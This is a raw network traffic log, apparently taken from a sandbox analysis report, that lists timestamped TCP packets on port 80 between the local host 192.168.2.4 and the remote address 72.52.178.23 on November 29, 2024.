                                                                                Nov 29, 2024 01:52:35.819912910 CET804977872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:35.819957018 CET804977872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:35.820080042 CET804977872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:35.820137024 CET804977872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:35.820301056 CET804977872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:35.820363998 CET804977872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:35.820467949 CET804977872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:35.831619024 CET4977980192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:35.834314108 CET804977772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:35.929794073 CET804977872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:35.930417061 CET4977880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:35.930443048 CET4977880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:35.951648951 CET804977972.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:35.951778889 CET4977980192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:35.951947927 CET4977980192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:36.050394058 CET804977872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:36.071855068 CET804977972.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:36.212188005 CET4978080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:36.332166910 CET804978072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:36.334419966 CET4978080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:36.334525108 CET4978080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:36.334578991 CET4978080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:36.334667921 CET4978080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:36.334692955 CET4978080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:36.454423904 CET804978072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:36.454498053 CET804978072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:36.454580069 CET804978072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:36.454597950 CET804978072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:36.454667091 CET4978080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:36.454679012 CET804978072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:36.454689980 CET804978072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:36.454745054 CET4978080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:36.454804897 CET804978072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:36.454814911 CET804978072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:36.454868078 CET4978080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:36.454916954 CET804978072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:36.454927921 CET804978072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:36.454963923 CET804978072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:36.454981089 CET4978080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:36.455012083 CET804978072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:36.455014944 CET4978080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:36.455142021 CET4978080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:36.574645996 CET804978072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:36.574666977 CET804978072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:36.574765921 CET4978080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:36.574794054 CET804978072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:36.574794054 CET4978080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:36.574862003 CET4978080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:36.574867010 CET804978072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:36.574919939 CET4978080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:36.617482901 CET804978072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:36.617641926 CET4978080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:36.737675905 CET804978072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:36.737932920 CET4978080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:36.781470060 CET804978072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:36.781641960 CET4978080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:36.901489019 CET804978072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:36.989420891 CET804978072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:36.992649078 CET4978080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:37.135400057 CET804977972.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:37.136655092 CET4977980192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:37.136655092 CET4977980192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:37.237457037 CET804978072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:37.240744114 CET4978080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:37.253721952 CET4978180192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:37.256580114 CET804977972.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:37.289180040 CET804978072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:37.291471958 CET4978080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:37.360727072 CET804978072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:37.373665094 CET804978172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:37.376425028 CET4978180192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:37.376539946 CET4978180192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:37.411539078 CET804978072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:37.411556005 CET804978072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:37.493460894 CET804978072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:37.493472099 CET804978072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:37.493474960 CET804978072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:37.493479013 CET804978072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:37.493482113 CET804978072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:37.493484974 CET804978072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:37.496488094 CET804978172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:37.518877983 CET804978072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:37.519038916 CET4978080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:37.519098043 CET4978080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:37.639034986 CET804978072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:37.762912989 CET4978280192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:37.883124113 CET804978272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:37.883187056 CET4978280192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:37.883363008 CET4978280192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:37.883363008 CET4978280192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:37.883435965 CET4978280192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:37.883460045 CET4978280192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:38.003267050 CET804978272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:38.003427029 CET804978272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:38.003472090 CET804978272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:38.003555059 CET4978280192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:38.003599882 CET804978272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:38.003609896 CET804978272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:38.003614902 CET804978272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:38.003753901 CET804978272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:38.003794909 CET804978272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:38.003926039 CET804978272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:38.003947973 CET804978272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:38.003974915 CET804978272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:38.004067898 CET804978272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:38.004096031 CET4978280192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:38.017527103 CET4978280192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:38.123802900 CET804978272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:38.123812914 CET804978272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:38.123960018 CET804978272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:38.123980045 CET4978280192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:38.124020100 CET4978280192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:38.124059916 CET804978272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:38.124106884 CET4978280192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:38.165498018 CET804978272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:38.165654898 CET4978280192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:38.285516024 CET804978272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:38.285621881 CET4978280192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:38.329467058 CET804978272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:38.329653978 CET4978280192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:38.449503899 CET804978272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:38.537477016 CET804978272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:38.537707090 CET4978280192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:38.559956074 CET804978172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:38.560137033 CET4978180192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:38.560189009 CET4978180192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:38.675638914 CET4978380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:38.680247068 CET804978172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:38.785573006 CET804978272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:38.785646915 CET4978280192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:38.795713902 CET804978372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:38.795896053 CET4978380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:38.796008110 CET4978380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:38.837615013 CET804978272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:38.837704897 CET4978280192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:38.905589104 CET804978272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:38.915962934 CET804978372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:38.957870007 CET804978272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:38.957936049 CET804978272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:38.958045006 CET804978272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:38.958060980 CET804978272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:38.958115101 CET804978272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:38.958161116 CET804978272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:38.958201885 CET804978272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:39.067451000 CET804978272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:39.067514896 CET4978280192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:39.067548037 CET4978280192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:39.187633991 CET804978272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:39.270267010 CET4978480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:39.390233994 CET804978472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:39.390315056 CET4978480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:39.390439034 CET4978480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:39.390506983 CET4978480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:39.390568018 CET4978480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:39.390592098 CET4978480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:39.510322094 CET804978472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:39.510624886 CET804978472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:39.510664940 CET804978472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:39.510674000 CET804978472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:39.510720968 CET804978472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:39.510729074 CET4978480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:39.510768890 CET804978472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:39.510785103 CET4978480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:39.510811090 CET4978480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:39.510829926 CET804978472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:39.510855913 CET804978472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:39.510902882 CET4978480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:39.510953903 CET804978472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:39.510977030 CET804978472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:39.511018991 CET4978480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:39.511023045 CET804978472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:39.511059999 CET804978472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:39.511110067 CET4978480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:39.630825996 CET804978472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:39.630836010 CET804978472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:39.630887985 CET4978480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:39.630930901 CET804978472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:39.630979061 CET804978472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:39.630987883 CET4978480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:39.631016016 CET4978480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:39.673671961 CET804978472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:39.673882961 CET4978480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:39.794019938 CET804978472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:39.794090986 CET4978480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:39.841531038 CET804978472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:39.955195904 CET4978480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:39.955197096 CET4978380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:39.957487106 CET804978472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:39.960441113 CET4978480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:39.979950905 CET804978372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:39.980716944 CET4978380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:40.066962004 CET4978580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:40.130028009 CET4978680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:40.187067986 CET804978572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:40.188457012 CET4978580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:40.188575983 CET4978580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:40.249969959 CET804978672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:40.250127077 CET4978680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:40.250339985 CET4978680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:40.250339985 CET4978680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:40.250394106 CET4978680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:40.250420094 CET4978680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:40.308583975 CET804978572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:40.370259047 CET804978672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:40.370376110 CET804978672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:40.370424032 CET804978672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:40.370433092 CET804978672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:40.370496035 CET4978680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:40.370534897 CET804978672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:40.370543003 CET804978672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:40.370589972 CET4978680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:40.370609045 CET804978672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:40.370616913 CET804978672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:40.370667934 CET4978680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:40.370711088 CET804978672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:40.370721102 CET804978672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:40.370763063 CET4978680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:40.370773077 CET804978672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:40.370780945 CET804978672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:40.370827913 CET4978680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:40.490535021 CET804978672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:40.490598917 CET804978672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:40.490608931 CET804978672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:40.490715027 CET4978680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:40.490750074 CET804978672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:40.490758896 CET804978672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:40.490813971 CET4978680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:40.533473015 CET804978672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:40.534446001 CET4978680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:40.654550076 CET804978672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:40.654628038 CET4978680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:40.701491117 CET804978672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:40.817466974 CET804978672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:40.817610979 CET4978680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:41.021492958 CET804978672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:41.021567106 CET4978680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:41.255989075 CET804978672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:41.258467913 CET4978680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:41.378531933 CET804978672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:41.378570080 CET804978672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:41.378668070 CET804978672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:41.378684044 CET804978672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:41.378815889 CET804978672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:41.378865957 CET804978672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:41.437453985 CET804978572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:41.437541008 CET4978580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:41.437602997 CET4978580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:41.494905949 CET804978672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:41.495007038 CET4978680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:41.495155096 CET4978680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:41.551542044 CET4978780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:41.557542086 CET804978572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:41.614964962 CET804978672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:41.662684917 CET4978880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:41.671551943 CET804978772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:41.671634912 CET4978780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:41.671772003 CET4978780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:41.782610893 CET804978872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:41.782725096 CET4978880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:41.782862902 CET4978880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:41.783000946 CET4978880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:41.783000946 CET4978880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:41.783072948 CET4978880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:41.791655064 CET804978772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:41.902738094 CET804978872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:41.902911901 CET804978872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:41.902929068 CET804978872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:41.902972937 CET804978872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:41.902987003 CET804978872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:41.903008938 CET4978880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:41.903023005 CET804978872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:41.903028965 CET4978880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:41.903049946 CET4978880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:41.903064013 CET4978880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:41.903120041 CET804978872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:41.903153896 CET804978872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:41.903162956 CET4978880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:41.903196096 CET4978880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:41.903227091 CET804978872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:41.903265953 CET804978872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:41.903270006 CET4978880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:41.903301001 CET804978872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:41.903306961 CET4978880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:41.903336048 CET804978872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:41.903367996 CET4978880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:41.903378010 CET4978880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:42.023027897 CET804978872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:42.023060083 CET804978872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:42.023132086 CET4978880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:42.023150921 CET4978880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:42.023282051 CET804978872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:42.023307085 CET804978872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:42.023334026 CET4978880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:42.023351908 CET4978880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:42.065505028 CET804978872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:42.065610886 CET4978880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:42.185560942 CET804978872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:42.185658932 CET4978880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:42.229506016 CET804978872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:42.229578972 CET4978880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:42.349560022 CET804978872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:42.437513113 CET804978872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:42.437576056 CET4978880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:42.685529947 CET804978872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:42.685587883 CET4978880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:42.736865044 CET804978872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:42.736941099 CET4978880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:42.805560112 CET804978872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:42.812056065 CET804978772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:42.812139988 CET4978780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:42.812189102 CET4978780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:42.857214928 CET804978872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:42.857244968 CET804978872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:42.857362032 CET804978872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:42.857426882 CET804978872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:42.857516050 CET804978872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:42.857533932 CET804978872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:42.857592106 CET804978872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:42.932117939 CET4978980192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:42.932131052 CET804978772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:42.966587067 CET804978872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:42.966644049 CET4978880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:42.966680050 CET4978880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:43.052176952 CET804978972.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:43.052659988 CET4978980192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:43.052773952 CET4978980192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:43.086622000 CET804978872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:43.132172108 CET4979080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:43.172920942 CET804978972.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:43.253104925 CET804979072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:43.254440069 CET4979080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:43.254591942 CET4979080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:43.254626036 CET4979080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:43.254683018 CET4979080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:43.254707098 CET4979080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:43.374773979 CET804979072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:43.374784946 CET804979072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:43.374826908 CET804979072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:43.374886990 CET4979080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:43.374913931 CET804979072.52.178.23192.168.2.4
